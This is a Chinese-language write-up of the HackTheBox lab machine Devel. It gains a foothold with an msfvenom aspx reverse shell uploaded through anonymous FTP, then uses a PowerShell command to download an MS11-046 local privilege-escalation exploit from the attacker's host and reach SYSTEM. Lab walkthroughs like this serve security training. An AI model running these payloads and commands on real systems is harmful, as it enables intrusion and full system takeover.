HackTheBox-Machines Devel Writeup

kazma 成大資安社 創辦人/社長

nmap 一下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
└──╼ [★]$ nmap -sV --script vuln 10.129.153.100
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-27 06:29 CDT
Stats: 0:03:46 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.64% done; ETC: 06:33 (0:00:01 remaining)
Nmap scan report for 10.129.153.100
Host is up (0.077s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
80/tcp open http Microsoft IIS httpd 7.5
| vulners:
| cpe:/a:microsoft:internet_information_services:7.5:
| PACKETSTORM:180580 10.0 https://vulners.com/packetstorm/PACKETSTORM:180580 *EXPLOIT*
| MSF:AUXILIARY-DOS-WINDOWS-FTP-IIS75_FTPD_IAC_BOF- 10.0 https://vulners.com/metasploit/MSF:AUXILIARY-DOS-WINDOWS-FTP-IIS75_FTPD_IAC_BOF- *EXPLOIT*
| CVE-2010-3972 10.0 https://vulners.com/cve/CVE-2010-3972
| SSV:20122 9.3 https://vulners.com/seebug/SSV:20122 *EXPLOIT*
| CVE-2010-2730 9.3 https://vulners.com/cve/CVE-2010-2730
| SSV:20121 4.3 https://vulners.com/seebug/SSV:20121 *EXPLOIT*
| PACKETSTORM:180584 4.3 https://vulners.com/packetstorm/PACKETSTORM:180584 *EXPLOIT*
| MSF:AUXILIARY-DOS-WINDOWS-HTTP-MS10_065_II6_ASP_DOS- 4.3 https://vulners.com/metasploit/MSF:AUXILIARY-DOS-WINDOWS-HTTP-MS10_065_II6_ASP_DOS- *EXPLOIT*
| CVE-2010-1899 4.3 https://vulners.com/cve/CVE-2010-1899
| EDB-ID:15803 0.0 https://vulners.com/exploitdb/EDB-ID:15803 *EXPLOIT*
|_ EDB-ID:15167 0.0 https://vulners.com/exploitdb/EDB-ID:15167 *EXPLOIT*
|_http-server-header: Microsoft-IIS/7.5
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 263.50 seconds

他有開 ftp,我們可以用 anonymous 登入看到下面的資訊:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
ftp> ftp 10.129.153.100
Connected to 10.129.153.100.
220 Microsoft FTP Service
Name (10.129.153.100:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
229 Entering Extended Passive Mode (|||49157|)
125 Data connection already open; Transfer starting.
03-18-17 01:06AM <DIR> aspnet_client
03-17-17 04:37PM 689 iisstart.htm
03-17-17 04:37PM 184946 welcome.png
226 Transfer complete.

透過瀏覽器可以看到下面的畫面:
ftp
這表示了 FTP 跟 HTTP 伺服器共享同一個根目錄,這問題很大,因為我們可以透過上傳惡意的文件,然後透過 http 來觸發,例如說 reverse shell。
這邊會用到 metasploit 框架中的一個工具,可以用來生 payloads。
透過下面的指令我們可以看到 aspx 是支援的格式,同時從剛剛 FTP 的資訊我們可以看到他的目錄名稱應該是 ASP.NET 生成的,包括 iisstart.htm 是一個標準的 IIS(Internet Information Services) 的起始頁面,可以得知上面在運行 Microsoft IIS Web 的伺服器。根據上面的資訊我們會用 aspx 來生成我們的 reverse shell。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
└──╼ [★]$ msfvenom --list formats

Framework Executable Formats [--format <value>]
===============================================

Name
----
asp
aspx
aspx-exe
axis2
dll
ducky-script-psh
elf
elf-so
exe
exe-only
exe-service
exe-small
hta-psh
jar
jsp
loop-vbs
macho
msi
msi-nouac
osx-app
psh
psh-cmd
psh-net
psh-reflection
python-reflection
vba
vba-exe
vba-psh
vbs
war

我們用下面的指令選一個看起來最普通的:

1
└──╼ [★]$ msfvenom --list payloads | grep windows | grep reverse 

生 reverse shell:

1
2
3
4
5
6
7
└──╼ [★]$ msfvenom -p windows/x64/shell/reverse_tcp -f aspx lhost=tun0 lport=4444 rhost=10.129.151.61 -o rshell.aspx
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of aspx file: 3675 bytes
Saved as: rshell.aspx

生好了!接著我們把他丟上去 FTP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
ftp> ftp 10.129.151.61
Connected to 10.129.151.61.
220 Microsoft FTP Service
Name (10.129.151.61:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> put rshell.aspx
local: rshell.aspx remote: rshell.aspx
229 Entering Extended Passive Mode (|||49157|)
125 Data connection already open; Transfer starting.
100% |*************************************************************************************************| 3722 59.15 MiB/s --:-- ETA
226 Transfer complete.
3722 bytes sent in 00:00 (13.98 KiB/s)
ftp> ls
229 Entering Extended Passive Mode (|||49158|)
125 Data connection already open; Transfer starting.
03-18-17 01:06AM <DIR> aspnet_client
03-17-17 04:37PM 689 iisstart.htm
10-28-24 01:39PM 3722 rshell.aspx
03-17-17 04:37PM 184946 welcome.png
226 Transfer complete.
ftp>

結果上面那個 payload 好像行不通,我換成下面這個就成功了:

1
2
3
4
5
6
7
└──╼ [★]$ msfvenom -p windows/shell_reverse_tcp -f aspx LHOST=10.10.14.63 LPORT=4444 -o rshell.aspx
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of aspx file: 2719 bytes
Saved as: rshell.aspx

然後瀏覽器訪問就觸發 reverse shell 了:

1
2
3
4
5
6
7
└──╼ [★]$ nc -nlvp 4444 
listening on [any] 4444 ...
connect to [10.10.14.63] from (UNKNOWN) [10.129.151.61] 49168
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

c:\windows\system32\inetsrv>

結果進去之後連 user flag 的權限都還沒有,然後也發現這台伺服器是 x86 難怪剛剛的第一次的 payload 不會過:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
c:\Users>cd babis
cd babis
Access is denied.

c:\Users>dir
dir
Volume in drive C has no label.
Volume Serial Number is 137F-3971

Directory of c:\Users

18/03/2017 01:16 �� <DIR> .
18/03/2017 01:16 �� <DIR> ..
18/03/2017 01:16 �� <DIR> Administrator
17/03/2017 04:17 �� <DIR> babis
18/03/2017 01:06 �� <DIR> Classic .NET AppPool
14/07/2009 09:20 �� <DIR> Public
0 File(s) 0 bytes
6 Dir(s) 4.396.625.920 bytes free

c:\Users>systeminfo
systeminfo

Host Name: DEVEL
OS Name: Microsoft Windows 7 Enterprise
OS Version: 6.1.7600 N/A Build 7600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Multiprocessor Free
Registered Owner: babis
Registered Organization:
Product ID: 55041-051-0948536-86302
Original Install Date: 17/3/2017, 4:17:31 ��
System Boot Time: 28/10/2024, 1:26:00 ��
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: X86-based PC
Processor(s): 1 Processor(s) Installed.
[01]: x64 Family 25 Model 1 Stepping 1 AuthenticAMD ~2595 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/11/2020
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: el;Greek
Input Locale: en-us;English (United States)
Time Zone: (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory: 3.071 MB
Available Physical Memory: 2.456 MB
Virtual Memory: Max Size: 6.141 MB
Virtual Memory: Available: 5.535 MB
Virtual Memory: In Use: 606 MB
Page File Location(s): C:\pagefile.sys
Domain: HTB
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) PRO/1000 MT Network Connection
Connection Name: Local Area Connection 4
DHCP Enabled: Yes
DHCP Server: 10.129.0.1
IP address(es)
[01]: 10.129.151.61
[02]: fe80::d981:e519:55b8:816
[03]: dead:beef::8870:1e16:d944:cf4e
[04]: dead:beef::d981:e519:55b8:816

從上面的資訊我們還可以得知作業系統的版本很舊,是 Windows 7 最早期的版本,已知存在許多漏洞。
我們可以透過 searchsploit 來找尋 Exploit Database (exploit-db) 中的漏洞資料使用方法如下,我們可以先去 google win7 x86 提權有哪些:
db
然後在上面可以看到左上角有一個 EDB-ID 我們可以這樣用:

1
2
3
4
5
6
7
8
9
└──╼ [★]$ searchsploit -u ## update
└──╼ [★]$ searchsploit -m 47176
Exploit: Microsoft Windows 7 build 7601 (x86) - Local Privilege Escalation
URL: https://www.exploit-db.com/exploits/47176
Path: /usr/share/exploitdb/exploits/windows_x86/local/47176.cpp
Codes: CVE-2019-1132
Verified: False
File Type: C source, ASCII text
Copied to: /home/kazma/47176.cpp

結果他沒有寫要怎麼編譯遇到很多環境問題,決定換另外一個有寫編譯方式的:

1
2
3
4
5
6
7
8
9
10
11
└──╼ [★]$ searchsploit -m 40564
Exploit: Microsoft Windows (x86) - 'afd.sys' Local Privilege Escalation (MS11-046)
URL: https://www.exploit-db.com/exploits/40564
Path: /usr/share/exploitdb/exploits/windows_x86/local/40564.c
Codes: CVE-2011-1249, MS11-046
Verified: True
File Type: C source, ASCII text
Copied to: /home/kazma/40564.c

┌─[eu-dedivip-1]─[10.10.14.63]─[kazma@htb-wnzfbgnuq9]─[~]
└──╼ [★]$ i686-w64-mingw32-gcc 40564.c -o 40564.exe -lws2_32

然後用 python 的 http.server 讓我們從目標機器載下 payload:

1
2
└──╼ [★]$ python -m http.server 
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

從目標機器載下來:

1
2
c:\Users>powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.63:8000/40564.exe', 'c:\Users\Public\Downloads\40564.exe')"
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.63:8000/40564.exe', 'c:\Users\Public\Downloads\40564.exe')"

執行腳本:

1
2
3
4
5
6
c:\Users\Public\Downloads>40564.exe
40564.exe

c:\Windows\System32>whoami
whoami
nt authority\system

拿下機器!

Pwned !!!

pwn

  • Title: HackTheBox-Machines Devel Writeup
  • Author: kazma
  • Created at : 2024-10-27 19:27:24
  • Updated at : 2024-10-28 21:09:23
  • Link: https://kazma.tw/2024/10/27/HackTheBox-Machines-Devel-Writeup/
  • License: This work is licensed under CC BY-NC-SA 4.0.
Comments
On this page
HackTheBox-Machines Devel Writeup